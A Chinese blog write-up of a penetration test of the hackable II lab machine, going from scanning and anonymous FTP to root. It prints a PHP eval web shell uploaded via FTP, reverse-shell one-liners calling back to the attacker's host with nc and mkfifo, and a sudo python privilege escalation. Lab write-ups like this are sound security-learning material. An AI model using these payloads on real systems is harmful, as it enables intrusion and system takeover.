hackableII靶机渗透记录

最新推荐文章于 2024-06-12 23:03:37 发布
最新推荐文章于 2024-06-12 23:03:37 发布
阅读量1.1k 收藏 7
点赞数 8
文章标签: python 网络安全 内网渗透 ctf php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/althumi/article/details/135074074
版权 
nmap -sP 10.80.56.0/24

主机:10.80.56.101
靶机:10.80.56.154

nmap -p- 10.80.56.154

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

#之前的语句没有扫出ftp是匿名登录,这个语句扫出来了
nmap  -A -p 1-65535 10.80.56.154

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2f:c6:2f:c4:6d:a6:f5:5b:c2:1b:f9:17:1f:9a:09:89 (RSA)
|   256 5e:91:1b:6b:f1:d8:81:de:8b:2c:f3:70:61:ea:6f:29 (ECDSA)
|_  256 f1:98:21:91:c8:ee:4d:a2:83:14:64:96:37:5b:44:3d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:FE:78:72 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#发现匿名登录,得到ftp账号和密码
用户:anonymous
密码:anonymous
ftp 10.80.56.154


dirsearch -u http://10.80.56.154

#扫描发现此文件夹下和ftp服务相通
dirsearch -u http://10.80.56.154/files/

#使用ftp的pull命令上传木马
<?php @eval($_POST["a"])?>
pull a.php
#使用蚁剑连接,打开终端
http://10.80.56.154/files/a.php
#尝试-e直接回弹shell给主机失败
nc -e /bin/bash 10.80.56.101 6666
#主机获取靶机shell成功
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.80.56.101 6666 >/tmp/f
#切换交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
#查询系统信息
uname -a
Linux ubuntu 4.4.0-194-generic 

lsb_release -a
Ubuntu 16.04.7 LTS
#尝试上次jangow01靶机的方式提权
nc -nlvp 1234 < 45010.c
nc 10.80.56.101 6666 > 45010.c
#编译失败,缺少文件
gcc 45010.c -o exp
#查看/home下存在重要文件,获取提示
cat important.txt
run the script to see the data
#得到shrek用户以及他的密钥
/.runme.sh
the secret key
is
trolled
restarting computer in 3 seconds...
restarting computer in 2 seconds...
restarting computer in 1 seconds...
⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
    shrek:cf4c2232354952690368f1b3dfdfb24d
#尝试直接ssh连接,密码错误
ssh shrek@10.80.56.154
#猜测密钥是md5加密,使用大数据网站解密成功
onion
#登录成功,获取第一个flag
cat user.txt 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXK0OkkkkO0KXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXOo:'.            .';lkXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXKo'                        .ckXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXx,                 ........      :OXXXXXXXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXXXXk.                  .............    'kXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXK;                    ...............    '0XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX0.          .:lol;.    .....;oxkxo:.....    oXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX0         .oNMMMMMMMO.  ...lXMMMMMMMWO;...    cXXXXXXXXXXXXXXX
XXXXXXXXXXXXXK.        lWMMMMMMMMMMW; ..xMMMMMMMMMMMMx....   lXXXXXXXXXXXXXX
XXXXXXXXXXXXX;        kMMMMMMMMMMMMMM..:MMMMMMMMMMMMMM0...    OXXXXXXXXXXXXX
XXXXXXXXXXXXO        oMMMMMXKXMMMMMMM:.kMMMMMMNKNMMMMMMo...   'XXXXXXXXXXXXX
XXXXXXXXXXXX,        WMMWl. :OK0MMMMMl.OMMMMo. ,OXXWMMMX...    XXXXXXXXXXXXX
XXXXXXXXXXXX        'MMM:   0MMocMMMM,.oMMMl   xMMO;MMMM...    kXXXXXXXXXXXX
XXXXXXXXXXX0        .MMM,    .. ;MMM0 ..NMM:    .. 'MMMW...    kXXXXXXXXXXXX
XXXXXXXXXXXO         XMMX'     ,NMMX  ..;WMN,     .XMMMO...    xXXXXXXXXXXXX
XXXXXXXXXXX0         .NMMMXkxkXMMMk   ...,0MMXkxkXMMMMN,...    dXXXXXXXXXXXX
XXXXXXXXXXXX          .xWMMMMMMWk.    .....c0MMMMMMMMk'....    dXXXXXXXXXXXX
XXXXXXXXXXXXl            ,colc'   .;::o:dc,..'codxdc''.....    dXXXXXXXXXXXX
XXXXXXXXXXXXX         .OOkxxdxxkOOOx ,d.:OOOOkxxxxkkOOd....    xXXXXXXXXXXXX
XXXXXXXXXXXXXd         oOOOOOOOOOOOOxOOOOOOOOOOOOOOOOO,....    OXXXXXXXXXXXX
XXXXXXXXXXXXXX.         cOOOOOOOOOOOOOOOOOOOOOOOOOOOx,.....    KXXXXXXXXXXXX
XXXXXXXXXXXXXXO          .xOOOOOOOOOOOOOOOOOOOOOOOkc.......    NXXXXXXXXXXXX
XXXXXXXXXXXXXXX;           ;kOOOOOOOOOOOOOOOOOOOkc.........   ,XXXXXXXXXXXXX
XXXXXXXXXXXXXXX0             ;kOOOOOOOOOOOOOOOd;...........   dXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX.              ,dOOOOOOOOOOdc'.............   xXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX.                 .''''..   ...............   .kXXXXXXXXXXXX
XXXXXXXXXXXXXXXK           .;okKNWWWWNKOd:.    ..............   'kXXXXXXXXXX
XXXXXXXXXXXXXXX'        .dXMMMMMMMMMMMMMMMMWO:    .............   'kXXXXXXXX
XXXXXXXXXXXXXK'       ,0MMMMMMMMMMMMMMMMMMMMMMWx.   ............    ,KXXXXXX
XXXXXXXXXXXKc       .0MMMMMMMMMMMMMMMMMMMMMMMMMMMk.   ............    xXXXXX
XXXXXXXXXXl        cWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMo   .............   :XXXX
XXXXXXXXK.        dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0    ............   .KXX
XXXXXXXX.        'MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMO   .............   'XX

invite-me: https://www.linkedin.com/in/eliastouguinho/
#查看用户目录,得知具有sudo权限文件 .sudo_as_admin_successful
ls -la
total 36
drwxr-xr-x 4 shrek shrek 4096 Jun 15  2021 .
drwxr-xr-x 3 root  root  4096 Nov 26  2020 ..
-rw------- 1 shrek shrek  199 Jun 15  2021 .bash_history
-rw-r--r-- 1 shrek shrek  220 Nov 25  2020 .bash_logout
-rw-r--r-- 1 shrek shrek 3771 Nov 25  2020 .bashrc
drwx------ 2 shrek shrek 4096 Nov 25  2020 .cache
drwxrwxr-x 2 shrek shrek 4096 Nov 25  2020 .nano
-rw-r--r-- 1 shrek shrek  655 Nov 25  2020 .profile
-rw-r--r-- 1 shrek shrek    0 Nov 25  2020 .sudo_as_admin_successful
-rw------- 1 shrek shrek 2983 Jun 15  2021 user.txt
#查看用户权限,发现可以root权限执行python3.5
sudo -l
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
#使用root权限切换root的shell
sudo /usr/bin/python3.5 -c "import pty;pty.spawn('/bin/bash')"
#提权成功,通关
cat root.txt
                            ____
        ____....----''''````|.
,'''````____....----; '.
| __....----''''````.-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/
althumi
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux 修改驱动权限,linux设备驱动归纳总结(八):1.总线、设备和驱动
weixin_36476826的博客
05-01 1241
linux设备驱动归纳总结(八):1.总线、设备和驱动xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx这几天一直在看设备模型,内核的代码看得我越来越沮丧,特别是kboject、kset和ktype之间的关系。但是,设备模型的归纳我打算先跳过这几个重要结构体,先介绍总线、设备和...
gzexe.XXXXXXXXXX decode
不惑之年
11-07 1677
只是zip压缩了下,把对应的提取出来后,写到压缩文件里,再解压就可以了 //这里的14是bash脚本上定义skip的值,一般是14 /usr/bin/tail -n +14 test.sh >/tmp/1.gz gunzip /tmp/1.gz
pip 安装出现 ERROR: Command errored out with exit status 1: 问题解决
最新发布
会飞的石头
06-12 637
pip 安装出现 ERROR: Command errored out with exit status 1: 问题解决
xxxxxxxxxxxxxxxxxxxxxxxxxxxx
weixin_34273481的博客
04-05 69万+
Get Authorization code:Request: https://accounts.google.com/o/oauth2/v2/auth?redirect_uri=https%3A%2F%2Fdevelopers.google.com%2Foauthplayground&prompt=consent&response_type=code&client_id=...
c++的学习——杨老师6班测试 送分题
qq_45630650的博客
01-17 1685
杨老师6班测试 送分题 描述 【题目描述】输入n,输出一个n*n的正方形,正方形由符号c1和c2组成,正方形的四条边和对角线由c1组成,其余部分由c2组成。 输入 一行一个整数,两个符号,分别以一个空格隔开。 输出 如题所述的正方形。 样例输入 10 X O 样例输出 XXXXXXXXXX XXOOOOOOXX XOXOOOOXOX XOOXOOXOOX XOOOXXOOOX XOOOXXOOOX...
C#取五笔或拼音代码
jinning13的专栏
05-12 3万+
        private string GetWbPy(string inputstring, string pywb)        {             string  thisletter = inputstring.Trim();            int letterlen  = thisletter.Length;            string pystring 
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
拼音首字母示例
xuzuning的专栏
12-23 1万+
$initial = YSXSM SDQLYBJJJKCZBJFYY JHYHSYZGJ   SN      XY  NQ    LGGLLYJDS YSSGYZYD XJYYDLDWJJWBBFTBXTHHBCZCRFMQWYFCWDZPYDDWYXJAYPSFTZYJXXXCXNNXXZZBPYSYZHMZBQBZCYZBXQSBHHXGFMBHHGQCXSTHLYGYMXALELCCXZRJ
91.vido.ws v.php,"token" parameter not in video info for unknown reason;
热门推荐
weixin_35307279的博客
03-29 90万+
youtube-dl -v --dump-pages https://www.youtube.com/watch?v=USg3NR76XpQ output[debug] System config: [][debug] User config: [u'--add-metadata', u'--user-agent', u'Mozilla/5.0 (X11; Ubuntu; Linux x86_64...
基于Arduino+Blinker的太阳能热水器改造
jcde062的博客
01-19 3825
乡下老家里的太阳能热水器装在楼顶,控制面板装在二楼,一楼用水不方便,总是要跑二楼看水位,查温度,想通过arduino+blinker的方案实现实时监测供水水塔和太阳能水箱的水位,空气温湿度等。除了在手机点灯App上实时监测水温水位以外,还能通过小度智能音箱去问湿度和水位。水少了还能通过智能开关打开抽水机补水。
疑问:明明有这个文件,为什么运行不了
weixin_40945354的博客
04-21 341
xxxxx@DESKTOP-TTPHC4V MINGW64 ~/MixPoet (master) $ python preprocess/preprocess.py Traceback (most recent call last): File "preprocess/preprocess.py", line 274, in <module> main() File "...
A. Inna and Choose Options
无知的我
03-10 1386
time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output There always is something to choose from! And now, instead of "No
poj 2225 Asteroids!【BFS】
nailnehc的博客
11-20 3684
Asteroids! Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 3087   Accepted: 1161 Description You're in space.  You want to get home.  There are asteroids. 
/usr/lib64/libstdc++.so.6: version `GLIBCXX_3.4.15' not found (required by ./xxxx
oiooooio的专栏
07-24 3480
可以试试命令:export LD_LIBRARY_PATH=/usr/local/lib:/usr/lib:/usr/local/lib64:/usr/lib64 标记!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值